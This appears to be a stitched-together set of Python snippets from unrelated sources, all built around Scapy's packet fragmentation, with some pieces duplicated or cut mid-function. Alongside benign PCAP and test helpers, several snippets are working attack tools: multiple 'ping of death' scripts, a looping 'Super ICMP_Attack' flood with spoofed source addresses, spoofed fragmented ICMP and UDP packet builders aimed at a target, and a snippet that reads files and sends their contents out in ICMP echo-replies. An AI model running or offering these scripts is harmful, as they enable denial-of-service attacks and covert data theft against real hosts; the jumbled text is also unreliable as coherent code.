def run(self, hosts):
# Send ICMP ping request, wait for answer
for host in hosts:
packet = fragment(IP(dst=str(host)) / ICMP()/("X"*60000))
resp = self.send_receive(packet, timeout=2, verbose=0)
def main():
parser = argparse.ArgumentParser(
description='Fragments the IPv4 packets in the given PCAP file '
'and writes the results to another file.')
parser.add_argument('input_file')
parser.add_argument('output_file')
parser.add_argument(
'--fragment-size',
'-s',
type=int,
default=500,
help='Fragment size. Packets larger than this are fragmented '
'if their df flag is not set. Defaults to 500.')
args = parser.parse_args()
reader = RawPcapReader(args.input_file)
writer = PcapWriter(args.output_file, append=False, sync=True)
for pkt_data in reader:
p = Ether(pkt_data[0])
if isinstance(
p[1],
IP) and len(p[2]) > args.fragment_size and p[1].flags & 2 != 0:
p = fragment(p, args.fragment_size)
print 'Fragmented packet into {} fragments.'.format(len(p))
writer.write(p)
def send_packet(packet):
SourceMac = packet[Ether].src
if SourceMac in macs:
del packet[Ether].src
del packet[IP].chksum
packet[Ether].dst = macs[(macs.index(SourceMac) + 1) % 2]
frags = fragment(packet)
for f in frags:
sendp(f, verbose=0)
def sendPerSecond(timestamp,ip,dataSize,mac,packets): # p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize); t=time(); p['IP'].src=ip; p2=fragment(p/''.zfill(dataSize)) print(str(size)+','+str(time()-t)) t=time(); packets.extend(p2); print(str(size)+','+str(time()-t)) t=time();
def generate_ip4_frags(self, payload_length, fragment_size):
p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length)
p_ip4 = IP(src="1.2.3.4", dst=self.pg0.remote_ip4)
outer_ip4 = (p_ether / IP(src=self.pg1.remote_ip4,
id=RandShort(),
dst=self.pg0.local_ip4) / p_ip4 / p_payload)
frags = fragment(outer_ip4, fragment_size)
p4_reply = (p_ip4 / p_payload)
p4_reply.ttl -= 1
return frags, p4_reply
def generate_ip4_frags(self, payload_length, fragment_size):
p_ether = Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac)
p_payload = UDP(sport=1234, dport=1234) / self.payload(payload_length)
p_ip4 = IP(src="1.2.3.4", dst=self.pg0.remote_ip4)
outer_ip4 = (p_ether / IP(
src=self.pg1.remote_ip4, id=RandShort(), dst=self.pg0.local_ip4) /
p_ip4 / p_payload)
frags = fragment(outer_ip4, fragment_size)
p4_reply = (p_ip4 / p_payload)
p4_reply.ttl -= 1
return frags, p4_reply
def build_fragmented_icmp_packet(destination_ip):
"""Generate fragmented ICMP packet with spoofed source IP address.
Argument:
destination_ip -- the IP address of the target
"""
return fragment(
IP(src=RandIP(),
dst=destination_ip,
id=RandShort(),
ttl=packet_builder.generate_ttl()) / ICMP(id=RandShort()) /
packet_builder.generate_payload(min_count=1500, max_count=65500),
fragsize=packet_builder.generate_fragsize())
def build_fragemneted_udp_packet(destination_ip, destination_port):
"""Generate fragmented UDP packet with random source port and spoofed source IP address.
Arguments:
destination_ip -- the IP address of the target
destination_port -- the targets port to which the packet will be sent
"""
return fragment(
IP(src=RandIP(),
dst=destination_ip,
id=RandShort(),
ttl=packet_builder.generate_ttl()) /
UDP(sport=RandShort(), dport=destination_port) /
packet_builder.generate_payload(min_count=1500, max_count=65500),
fragsize=packet_builder.generate_fragsize())
def send_packet(self, packet, **kwargs):
"""
If the destination is an IP just transfert it.
If this is an DN try to get the IP otherwise put the packet in the
pool and trigger a DNS request for the given DN
"""
if not kwargs.has_key("IP"):
kwargs["IP"] = {}
if not kwargs["IP"].has_key("id"):
kwargs["IP"]['id'] = random.randrange(1, 65535)
p = self.forge_packet(packet, **kwargs["IP"])
if len(p) > self.MTU:
fragments = fragment(p, fragsize=self.MTU)
for frag in fragments:
self.transfer_packet(frag, **kwargs)
else:
self.transfer_packet(p, **kwargs)
'''
def send_packet(self, packet, **kwargs):
"""
If the destination is an IP just transfert it.
If this is an DN try to get the IP otherwise put the packet in the
pool and trigger a DNS request for the given DN
"""
if not kwargs.has_key("IP"):
kwargs["IP"] = {}
if not kwargs["IP"].has_key("id"):
kwargs["IP"]['id'] = random.randrange(1, 65535)
p = self.forge_packet(packet, **kwargs["IP"])
if len(p) > self.MTU:
fragments = fragment(p, fragsize=self.MTU)
for frag in fragments:
self.transfer_packet(frag, **kwargs)
else:
self.transfer_packet(p, **kwargs)
'''
def fragment(self, original, fragsize):
"""
Fragments a packet into two, given the size of the first packet (0:fragsize)
Always returns two packets
"""
if fragsize == 0:
frags = [original]
else:
frags = fragment(original, fragsize=fragsize)
# If there were more than 2 fragments, join the loads so we still have 2 packets
if len(frags) > 2:
for frag in frags[2:]:
frags[1]["IP"].load += frag["IP"].load
# After scapy fragmentation, the flags field is set to "MF+DF"
# In order for the packet to remain valid, strip out the "MF"
frags[1]["IP"].flags = "DF"
# If scapy tried to fragment but there were only enough bytes for 1 packet, just duplicate it
elif len(frags) == 1:
frags.append(frags[0].copy())
return frags[0], frags[1]
def Ping_attack():
clear = os.system('clear')
print("**************************************")
print(" Super ICMP_Attack")
print("**************************************")
print("please input your attack target's IP")
target = input("[Super ICMP_attack]#")
srcip = scapy.RandIP()
attack_numbers=0
try:
while True:
packet = scapy.fragment(scapy.IP(src=srcip,dst=target)/scapy.ICMP()/("X"*2000))
scapy.send(packet,verbose=False)
attack_numbers += 1
print("[+]Attack Number is "+str(attack_numbers))
time.sleep(2)
except KeyboardInterrupt:
print("[-]Ctrl + C detected.....")
def send(self, packet):
original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet
if self.verbose > 1:
print "Original packet:"
original_packet.show()
hexdump(str(original_packet))
fragments = fragment(original_packet, fragsize = self.fragment_size)
try:
i = 1
for frag in fragments:
if self.verbose > 1:
print "Fragment %d of %d:" % (i, len(fragments))
frag.show()
frag = str(frag)
length = struct.pack(">I", len(frag))
if not self.sock:
print '[+] connecting ...'
self.sock = self.create()
print '[+] sending part %d of %d now..' % (i, len(fragments))
hexdump(frag)
if self.log:
self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag)
self.sock.send(length)
self.sock.send(frag)
if self.log:
self.log('sent fragment %d of %d' % (i, len(fragments)))
i += 1
if self.raw_send:
if self.log:
self.log('forcing a new connection due to raw_send flag')
self.close()
except KeyboardInterrupt,e:
print "[-] keyboard interrupt while connecting/sending to redirector"
raise KeyboardInterrupt,e
def run(self):
print "death pinging " + self.ip
send(fragment(IP(dst=self.ip) / ICMP() / ("V" * self.length)))
def sendPerSecond(timestamp, ip, dataSize, mac, packets):
# p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize);
packetPrototype['IP'].src = ip
p2 = fragment(packetPrototype / ''.zfill(dataSize))
packets.extend(p2)
def POD(ip_addr, amt):
send(fragment(IP(dst=ip_addr) / ICMP() / ("X" * int(amt))))
return 1
#!/usr/bin/python
# This tool is for educational use only!
# Description: Ping of death
# Requirements: scapy + root privileges
import sys
from scapy.all import send, fragment, IP, ICMP
if len(sys.argv) < 2:
print "{0} <dst_ip>".format(sys.argv[0])
sys.exit(1)
send(fragment(IP(dst=sys.argv[1]) / ICMP() / ("X" * 60000)))
#!/usr/bin/python
# This tool is for educational use only!
# Description: Ping of death
# Requirements: scapy + root privileges
import sys
from scapy.all import send, fragment, IP, ICMP
if len(sys.argv) < 2:
print "{0} <dst_ip>".format(sys.argv[0])
sys.exit(1)
send(fragment(IP(dst=sys.argv[1]) / ICMP() / ("X"*60000)))
infos = data[:6]
filename = data[6:]
dataUnpacked = unpack('IH',infos)
offset = dataUnpacked[0]
size = dataUnpacked[1]
sys.stdout.write("Filename : " + filename + "\nOffset : " + str(offset) + "\n")
try:
f = open(filename)
except:
print "%s not found"%filename
continue
f.seek(offset)
line = f.read(size)
f.close()
send(fragment(IP(dst=sys.argv[2]) / ICMP(type='echo-reply', id=ident, seq=seq_id) / (line)))
except:
if len(data) == 0:
print "End"
else:
print "Invalid ICMP buffer"
if __name__ == '__main__':
if len(sys.argv) < 3:
msg = 'missing mandatory options. Execute as root:\n'
msg += './icmpsh_download_cli.py <source IP address> <destination IP address>\n'
sys.stderr.write(msg)
sys.exit(1)
main(sys.argv[1], sys.argv[2])
def sendPerSecond(timestamp,ip,dataSize,mac,packets): # p=Ether(dst=mac)/IP(src=ip)/TCP()/''.zfill(dataSize); packetPrototype['IP'].src=ip; p2=fragment(packetPrototype/''.zfill(dataSize)); packets.extend(p2);
